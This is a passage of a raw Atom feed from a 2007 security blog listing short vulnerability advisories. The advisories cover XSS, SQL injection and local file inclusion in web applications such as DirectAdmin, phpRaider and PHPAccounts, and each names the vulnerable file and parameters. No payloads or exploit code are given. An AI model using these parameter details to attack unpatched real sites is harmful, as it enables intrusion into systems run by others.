/&gt;###############################################&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1009764183767741775-9202681383901959597?l=pridels-team.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pridels-team.blogspot.com/feeds/9202681383901959597/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1009764183767741775&amp;postID=9202681383901959597' title='3 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1009764183767741775/posts/default/9202681383901959597'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1009764183767741775/posts/default/9202681383901959597'/><link rel='alternate' type='text/html' href='http://pridels-team.blogspot.com/2007/08/openrat-vuln.html' title='OpenRat  vuln.'/><author><name>r0t</name><uri>http://www.blogger.com/profile/10020805488138121878</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>3</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1009764183767741775.post-9116821402581572817</id><published>2007-08-01T10:08:00.000-07:00</published><updated>2007-08-01T10:13:14.409-07:00</updated><title type='text'>WebDirector XSS vuln.</title><content type='html'>###############################################&lt;br /&gt;Vuln. discovered by : r0t&lt;br /&gt;Date: 1 August 2007&lt;br /&gt;vendor:www.webdirector.ru&lt;br /&gt;affected versions:2.2 and previous&lt;br /&gt;###############################################&lt;br /&gt;&lt;br /&gt;WebDirector contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "deslocal" parameter in "webdirector/index.php" isn't properly sanitised before being returned to the user.&lt;br /&gt;This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;###############################################&lt;br /&gt;Solution:&lt;br /&gt;Edit the source code to ensure that input is properly sanitised.&lt;br /&gt;###############################################&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1009764183767741775-9116821402581572817?l=pridels-team.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pridels-team.blogspot.com/feeds/9116821402581572817/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1009764183767741775&amp;postID=9116821402581572817' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1009764183767741775/posts/default/9116821402581572817'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1009764183767741775/posts/default/9116821402581572817'/><link rel='alternate' type='text/html' href='http://pridels-team.blogspot.com/2007/08/webdirector-xss-vuln.html' title='WebDirector XSS vuln.'/><author><name>r0t</name><uri>http://www.blogger.com/profile/10020805488138121878</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1009764183767741775.post-3539622661278607854</id><published>2007-07-25T04:04:00.001-07:00</published><updated>2007-07-25T04:04:58.390-07:00</updated><title type='text'>Secure XSS vuln.</title><content type='html'>###############################################&lt;br /&gt;Vuln. discovered by : r0t&lt;br /&gt;Date: 25 July 2007&lt;br /&gt;vendor:http://www.formfields.com/secureArea/secureProduct.php&lt;br /&gt;affected versions:v1.0.20070629 and previous&lt;br /&gt;###############################################&lt;br /&gt;&lt;br /&gt;Secure contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "user" and "pwd" parameter in "login.php" isn't properly sanitised before being returned to the user.&lt;br /&gt;This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.&lt;br /&gt;&lt;br /&gt;###############################################&lt;br /&gt;Solution:&lt;br /&gt;Edit the source code to ensure that input is properly sanitised.&lt;br /&gt;###############################################&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1009764183767741775-3539622661278607854?l=pridels-team.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pridels-team.blogspot.com/feeds/3539622661278607854/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1009764183767741775&amp;postID=3539622661278607854' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1009764183767741775/posts/default/3539622661278607854'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1009764183767741775/posts/default/3539622661278607854'/><link rel='alternate' type='text/html' href='http://pridels-team.blogspot.com/2007/07/secure-xss-vuln.html' title='Secure XSS vuln.'/><author><name>r0t</name><uri>http://www.blogger.com/profile/10020805488138121878</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1009764183767741775.post-3793631967588400526</id><published>2007-07-25T04:03:00.000-07:00</published><updated>2007-07-25T04:04:28.350-07:00</updated><title type='text'>AdMan XSS vuln.</title><content type='html'>###############################################&lt;br /&gt;Vuln. discovered by : r0t&lt;br /&gt;Date: 25 July 2007&lt;br /&gt;vendor:http://www.formfields.com/adManArea/adManProduct.php&lt;br /&gt;affected versions:AdMan v1.0.20051202 - FF 3 Patch and previous&lt;br /&gt;###############################################&lt;br /&gt;&lt;br /&gt;AdMan contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "user" and "pwd" parameter in "login.php" isn't properly sanitised before being returned to the user.&lt;br /&gt;This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.&lt;br /&gt;&lt;br /&gt;###############################################&lt;br /&gt;Solution:&lt;br /&gt;Edit the source code to ensure that input is properly sanitised.&lt;br /&gt;###############################################&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1009764183767741775-3793631967588400526?l=pridels-team.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pridels-team.blogspot.com/feeds/3793631967588400526/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1009764183767741775&amp;postID=3793631967588400526' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1009764183767741775/posts/default/3793631967588400526'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1009764183767741775/posts/default/3793631967588400526'/><link rel='alternate' type='text/html' href='http://pridels-team.blogspot.com/2007/07/adman-xss-vuln.html' title='AdMan XSS vuln.'/><author><name>r0t</name><uri>http://www.blogger.com/profile/10020805488138121878</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1009764183767741775.post-3634350019062665233</id><published>2007-06-28T06:23:00.001-07:00</published><updated>2007-06-28T06:23:39.961-07:00</updated><title type='text'>DirectAdmin XSS vuln.</title><content type='html'>###############################################&lt;br /&gt;Vuln. discovered by : r0t&lt;br /&gt;Date: 28 June  2007&lt;br /&gt;vendor:http://www.directadmin.com&lt;br /&gt;affected versions:v1.30.1 and previous&lt;br /&gt;###############################################&lt;br /&gt;&lt;br /&gt;DirectAdmin contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "domain" parameter in "CMD_USER_STATS" isn't properly sanitised before being returned to the user.&lt;br /&gt;This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.&lt;br /&gt;&lt;br /&gt;###############################################&lt;br /&gt;Solution:&lt;br /&gt;Edit the source code to ensure that input is properly sanitised.&lt;br /&gt;###############################################&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1009764183767741775-3634350019062665233?l=pridels-team.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pridels-team.blogspot.com/feeds/3634350019062665233/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1009764183767741775&amp;postID=3634350019062665233' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1009764183767741775/posts/default/3634350019062665233'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1009764183767741775/posts/default/3634350019062665233'/><link rel='alternate' type='text/html' href='http://pridels-team.blogspot.com/2007/06/directadmin-xss-vuln.html' title='DirectAdmin XSS vuln.'/><author><name>r0t</name><uri>http://www.blogger.com/profile/10020805488138121878</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1009764183767741775.post-6698676799755392272</id><published>2007-06-27T02:27:00.001-07:00</published><updated>2007-06-27T02:27:57.336-07:00</updated><title type='text'>rwAuction Pro XSS vuln.</title><content type='html'>###############################################&lt;br /&gt;Vuln. discovered by : r0t&lt;br /&gt;Date: 27 June  2007&lt;br /&gt;vendor:http://www.rainworx.com/&lt;br /&gt;affected versions:rwAuction Pro v5.0&lt;br /&gt;other versions also can be affected.&lt;br /&gt;###############################################&lt;br /&gt;&lt;br /&gt;rwAuction Pro contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "search","show","searchtype","catid","searchtxt" parameter in "search.asp" isn't properly sanitised before being returned to the user.&lt;br /&gt;This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Note: Input in "searchtxt" parameter was vuln. already in rwAuction Pro 4.x and still unpatched in 5.0 version.&lt;br /&gt;ref:http://secunia.com/advisories/17905/&lt;br /&gt;###############################################&lt;br /&gt;Solution:&lt;br /&gt;Edit the source code to ensure that input is properly sanitised.&lt;br /&gt;###############################################&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1009764183767741775-6698676799755392272?l=pridels-team.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pridels-team.blogspot.com/feeds/6698676799755392272/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1009764183767741775&amp;postID=6698676799755392272' title='2 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1009764183767741775/posts/default/6698676799755392272'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1009764183767741775/posts/default/6698676799755392272'/><link rel='alternate' type='text/html' href='http://pridels-team.blogspot.com/2007/06/rwauction-pro-xss-vuln.html' title='rwAuction Pro XSS vuln.'/><author><name>r0t</name><uri>http://www.blogger.com/profile/10020805488138121878</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1009764183767741775.post-9064617288071549867</id><published>2007-06-27T01:48:00.001-07:00</published><updated>2007-06-27T01:48:53.057-07:00</updated><title type='text'>QuickTalk guestbook sql inj.</title><content type='html'>###############################################&lt;br /&gt;Vuln. discovered by : r0t&lt;br /&gt;Date: 27 June  2007&lt;br /&gt;vendor:http://www.qt-cute.org/&lt;br /&gt;affected versions: tested on QuickTalk guestbook 1.2&lt;br /&gt;other versions also can be affected.&lt;br /&gt;###############################################&lt;br /&gt;&lt;br /&gt;QuickTalk guestbook contains a flaw that allows a remote sql injection attacks. Input passed to the "id" parameter in "qtg_msg_view.php"  isn't properly sanitised before being used in a SQL query.&lt;br /&gt;This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;###############################################&lt;br /&gt;Solution:&lt;br /&gt;Edit the source code to ensure that input is properly sanitised.&lt;br /&gt;###############################################&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1009764183767741775-9064617288071549867?l=pridels-team.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pridels-team.blogspot.com/feeds/9064617288071549867/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1009764183767741775&amp;postID=9064617288071549867' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1009764183767741775/posts/default/9064617288071549867'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1009764183767741775/posts/default/9064617288071549867'/><link rel='alternate' type='text/html' href='http://pridels-team.blogspot.com/2007/06/quicktalk-guestbook-sql-inj.html' title='QuickTalk guestbook sql inj.'/><author><name>r0t</name><uri>http://www.blogger.com/profile/10020805488138121878</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1009764183767741775.post-9070601285456619523</id><published>2007-06-27T01:30:00.000-07:00</published><updated>2007-06-28T06:45:28.172-07:00</updated><title type='text'>QuickTicket multiple sql inj.</title><content type='html'>###############################################&lt;br /&gt;Vuln. discovered by : r0t&lt;br /&gt;Date: 27 June  2007&lt;br /&gt;vendor:http://www.qt-cute.org/&lt;br /&gt;affected versions: tested on QuickTicket 1.2 build:20070621&lt;br /&gt;other versions also can be affected.&lt;br /&gt;###############################################&lt;br /&gt;&lt;br /&gt;QuickTicket contains a flaw that allows a remote sql injection attacks.Input passed to the "dir","order" parameter in "qti_ind_member.php"  isn't properly sanitised before being used in a SQL query..&lt;br /&gt;This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.&lt;br /&gt;&lt;br /&gt;###############################################&lt;br /&gt;Solution:&lt;br /&gt;Edit the source code to ensure that input is properly sanitised.&lt;br /&gt;###############################################&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1009764183767741775-9070601285456619523?l=pridels-team.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pridels-team.blogspot.com/feeds/9070601285456619523/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1009764183767741775&amp;postID=9070601285456619523' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1009764183767741775/posts/default/9070601285456619523'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1009764183767741775/posts/default/9070601285456619523'/><link rel='alternate' type='text/html' href='http://pridels-team.blogspot.com/2007/06/quickticket-multiple-sql-inj.html' title='QuickTicket multiple sql inj.'/><author><name>r0t</name><uri>http://www.blogger.com/profile/10020805488138121878</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1009764183767741775.post-5943161220046006441</id><published>2007-06-23T08:43:00.000-07:00</published><updated>2007-06-23T08:48:37.105-07:00</updated><title type='text'>I'm back</title><content type='html'>What is up my friends? Sorry for disappearing without any info, had a lot of stuff going on. Anyways I have returned and am ready for some action! I've lost my icq contacts, my number is the same: 205910312.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1009764183767741775-5943161220046006441?l=pridels-team.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pridels-team.blogspot.com/feeds/5943161220046006441/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1009764183767741775&amp;postID=5943161220046006441' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1009764183767741775/posts/default/5943161220046006441'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1009764183767741775/posts/default/5943161220046006441'/><link rel='alternate' type='text/html' href='http://pridels-team.blogspot.com/2007/06/im-back.html' title='I&apos;m back'/><author><name>cembo</name><uri>http://www.blogger.com/profile/14368916156864005770</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1009764183767741775.post-5986502966759423506</id><published>2007-06-22T08:07:00.000-07:00</published><updated>2007-06-22T08:08:29.822-07:00</updated><title type='text'>ClickGallery Server vuln.</title><content type='html'>###############################################&lt;br /&gt;Vuln. discovered by : r0t&lt;br /&gt;Date: 2 May  2007&lt;br /&gt;vendor:http://www.clicktech.com/&lt;br /&gt;affected versions: 5.1 and previous&lt;br /&gt;###############################################&lt;br /&gt;&lt;br /&gt;1.&lt;br /&gt;ClickGallery Server contains a flaw that allows a remote sql injection attacks.Input passed to the "image_id" parameter in "edit_image.asp" isn't properly sanitised before being used in a SQL query.&lt;br /&gt;This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.&lt;br /&gt;&lt;br /&gt;2.&lt;br /&gt;ClickGallery Server contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "from" parameter in "edit_image.asp" isn't properly sanitised before being returned to the user.&lt;br /&gt;This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.&lt;br /&gt;&lt;br /&gt;###############################################&lt;br /&gt;Solution:&lt;br /&gt;Edit the source code to ensure that input is properly sanitised.&lt;br /&gt;###############################################&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1009764183767741775-5986502966759423506?l=pridels-team.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pridels-team.blogspot.com/feeds/5986502966759423506/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1009764183767741775&amp;postID=5986502966759423506' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1009764183767741775/posts/default/5986502966759423506'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1009764183767741775/posts/default/5986502966759423506'/><link rel='alternate' type='text/html' href='http://pridels-team.blogspot.com/2007/06/clickgallery-server-vuln.html' title='ClickGallery Server vuln.'/><author><name>r0t</name><uri>http://www.blogger.com/profile/10020805488138121878</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1009764183767741775.post-3503038102015364117</id><published>2007-06-22T07:20:00.000-07:00</published><updated>2007-06-28T06:42:54.921-07:00</updated><title type='text'>access2asp XSS vuln.</title><content type='html'>###############################################&lt;br /&gt;Vuln. discovered by : r0t&lt;br /&gt;Date: 22 June  2007&lt;br /&gt;vendor:http://www.access2asp.com/&lt;br /&gt;affected versions: access2asp v4.5 and prior&lt;br /&gt;###############################################&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;access2asp contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "od","search" to certain pages generated with access2asp isn't properly sanitised before being returned to the user.&lt;br /&gt;This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;###############################################&lt;br /&gt;Solution:&lt;br /&gt;Edit the source code to ensure that input is properly sanitised.&lt;br /&gt;###############################################&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1009764183767741775-3503038102015364117?l=pridels-team.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pridels-team.blogspot.com/feeds/3503038102015364117/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1009764183767741775&amp;postID=3503038102015364117' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1009764183767741775/posts/default/3503038102015364117'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1009764183767741775/posts/default/3503038102015364117'/><link rel='alternate' type='text/html' href='http://pridels-team.blogspot.com/2007/06/access2asp-xss-vuln.html' title='access2asp XSS vuln.'/><author><name>r0t</name><uri>http://www.blogger.com/profile/10020805488138121878</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1009764183767741775.post-8038003172561319612</id><published>2007-06-22T07:19:00.000-07:00</published><updated>2007-06-22T07:20:01.897-07:00</updated><title type='text'>bosDataGrid XSS vuln.</title><content type='html'>###############################################&lt;br /&gt;Vuln. discovered by : r0t&lt;br /&gt;Date: 22 June  2007&lt;br /&gt;vendor:http://www.bitego.com/&lt;br /&gt;affected versions: 2.50 and prior&lt;br /&gt;###############################################&lt;br /&gt;&lt;br /&gt;bosDataGrid contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "GridSearch","gsearch"  and "ParentID" parameter isn't properly sanitised before being returned to the user.&lt;br /&gt;This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;###############################################&lt;br /&gt;Solution:&lt;br /&gt;Edit the source code to ensure that input is properly sanitised.&lt;br /&gt;###############################################&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1009764183767741775-8038003172561319612?l=pridels-team.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pridels-team.blogspot.com/feeds/8038003172561319612/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1009764183767741775&amp;postID=8038003172561319612' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1009764183767741775/posts/default/8038003172561319612'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1009764183767741775/posts/default/8038003172561319612'/><link rel='alternate' type='text/html' href='http://pridels-team.blogspot.com/2007/06/bosdatagrid-xss-vuln.html' title='bosDataGrid XSS vuln.'/><author><name>r0t</name><uri>http://www.blogger.com/profile/10020805488138121878</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1009764183767741775.post-7828216307904461468</id><published>2007-06-22T02:55:00.000-07:00</published><updated>2007-06-22T02:56:22.940-07:00</updated><title type='text'>phpRaider sql vuln.</title><content type='html'>###############################################&lt;br /&gt;Vuln. discovered by : r0t&lt;br /&gt;Date: 22 June  2007&lt;br /&gt;vendor:http://phpraider.com/&lt;br /&gt;affected versions: phpRaider v1.0.0.rc8&lt;br /&gt;other versions also can be affected.&lt;br /&gt;###############################################&lt;br /&gt;&lt;br /&gt;phpRaider contains a flaw that allows a remote sql injection attacks.Input passed to the "id" and "type" parameter in "index.php" isn't properly sanitised before being used in a SQL query.&lt;br /&gt;This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;###############################################&lt;br /&gt;Solution:&lt;br /&gt;Edit the source code to ensure that input is properly sanitised.&lt;br /&gt;###############################################&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1009764183767741775-7828216307904461468?l=pridels-team.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pridels-team.blogspot.com/feeds/7828216307904461468/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1009764183767741775&amp;postID=7828216307904461468' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1009764183767741775/posts/default/7828216307904461468'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1009764183767741775/posts/default/7828216307904461468'/><link rel='alternate' type='text/html' href='http://pridels-team.blogspot.com/2007/06/phpraider-sql-vuln.html' title='phpRaider sql vuln.'/><author><name>r0t</name><uri>http://www.blogger.com/profile/10020805488138121878</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1009764183767741775.post-6879410596292725572</id><published>2007-06-21T07:00:00.001-07:00</published><updated>2007-06-21T07:00:43.617-07:00</updated><title type='text'>PHPAccounts vuln.</title><content type='html'>###############################################&lt;br /&gt;Vuln. discovered by : r0t&lt;br /&gt;Date: 21 June  2007&lt;br /&gt;vendor:http://phpaccounts.com/&lt;br /&gt;affected versions: PHPAccounts 0.5&lt;br /&gt;other versions also can be affected.&lt;br /&gt;###############################################&lt;br /&gt;&lt;br /&gt;1.Local file inclussion&lt;br /&gt;PHPAccounts contains a flaw that allows a Local file inclusion attacks.Input passed to the "page" parameter  in "index.php" isn't properly verified, before it is used to include files. This can be exploited to include arbitrary files from local resources.&lt;br /&gt;&lt;br /&gt;2. SQL Injection&lt;br /&gt;PHPAccounts contains a flaw that allows a remote sql injection attacks.Input passed to the "Outgoing_Type_ID","Outgoing_ID","Project_ID","Client_ID","Invoice_ID","Vendor_ID" parameter in "index.php" isn't properly sanitised before being used in a SQL query.&lt;br /&gt;This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;###############################################&lt;br /&gt;Solution:&lt;br /&gt;Edit the source code to ensure that input is properly sanitised.&lt;br /&gt;###############################################&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1009764183767741775-6879410596292725572?l=pridels-team.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pridels-team.blogspot.com/feeds/6879410596292725572/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1009764183767741775&amp;postID=6879410596292725572' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1009764183767741775/posts/default/6879410596292725572'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1009764183767741775/posts/default/6879410596292725572'/><link rel='alternate' type='text/html' href='http://pridels-team.blogspot.com/2007/06/phpaccounts-vuln.html' title='PHPAccounts vuln.'/><author><name>r0t</name><uri>http://www.blogger.com/profile/10020805488138121878</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1009764183767741775.post-5093187330020778819</id><published>2007-06-21T05:58:00.000-07:00</published><updated>2007-06-21T05:59:13.132-07:00</updated><title type='text'>netjukebox  vuln.</title><content type='html'>###############################################&lt;br /&gt;Vuln. discovered by : r0t&lt;br /&gt;Date: 21 June  2007&lt;br /&gt;vendor:http://www.netjukebox.nl/&lt;br /&gt;affected versions: tested on "netjukebox 4.01b"&lt;br /&gt;other versions also can be affected.&lt;br /&gt;###############################################&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;netjukebox contains a  flaws that allows a remote Cross-Site Scripting attacks.Input passed to the "album_id","order","sort","filter","genre_id" parameter in "index.php" isn't properly sanitised before being returned to the user.&lt;br /&gt;And Input passed to the "url" parameter in "ridirect.php" isn't properly sanitised before being returned to the user.&lt;br /&gt;This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Also attacker by testing XSS vuln. parameters will get full install path.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;###############################################&lt;br /&gt;Solution:&lt;br /&gt;Edit the source code to ensure that input is properly sanitised.&lt;br /&gt;###############################################&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1009764183767741775-5093187330020778819?l=pridels-team.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pridels-team.blogspot.com/feeds/5093187330020778819/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1009764183767741775&amp;postID=5093187330020778819' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1009764183767741775/posts/default/5093187330020778819'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1009764183767741775/posts/default/5093187330020778819'/><link rel='alternate' type='text/html' href='http://pridels-team.blogspot.com/2007/06/netjukebox-vuln.html' title='netjukebox  vuln.'/><author><name>r0t</name><uri>http://www.blogger.com/profile/10020805488138121878</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' 